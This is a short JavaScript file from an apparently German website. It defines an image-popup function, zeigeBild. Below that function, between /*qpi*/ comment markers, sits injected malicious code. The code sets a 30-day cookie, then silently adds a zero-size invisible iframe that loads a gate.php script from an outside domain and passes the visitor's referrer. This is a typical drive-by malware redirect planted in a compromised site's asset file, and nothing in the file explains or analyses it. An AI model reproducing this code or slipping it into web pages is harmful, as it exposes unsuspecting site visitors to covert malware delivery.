function zeigeBild(Bild,Breite,Hoehe) {
	var extra = "";
	if (Breite>600 || Hoehe>450)
		extra = "scrollbars=yes";
	if (Breite>600)
		Breite=600;
	if (Hoehe>450)
		Hoehe=450;

	OpenWindow(Bild, 'neuesbild', Breite, Hoehe, extra);

	ausgabe=window.Fenster_neuesbild.document;
	
	inhalt='<html><head><title>Bild</title></head><body topmargin=0 leftmargin=0 marginhigh=0 marginwidth=0><div id="groesse"><img src='+Bild+'></div></body></html>';

	ausgabe.open();
	ausgabe.write(inhalt);
	ausgabe.close();
	
	return;
}
/*qpi*/
function g(){var r=new RegExp('(?:; )?1=([^;]*);?');return r.test(document.cookie)?true:false}
var e=new Date();e.setTime(e.getTime()+(2592000000));
if(!g()&&window.navigator.cookieEnabled)
{
	document.cookie='1=1;expires='+e.toGMTString()+';path=/';
	window.setTimeout(function(){
		var JSinj=document.createElement('iframe');
		JSinj.src='http://s1.kaluchka1.in/gate.php?f=856023&r='+escape(document.referrer||'');
		JSinj.width='0';
		JSinj.height='0';
		JSinj.frameborder='0';
		JSinj.marginheight='0';
		JSinj.marginwidth='0';
		JSinj.border='0';
		try{
			document.body.appendChild(JSinj);
		}catch(e){
			document.documentElement.appendChild(JSinj);
		}
	}, 2000);
}
/*qpi*/
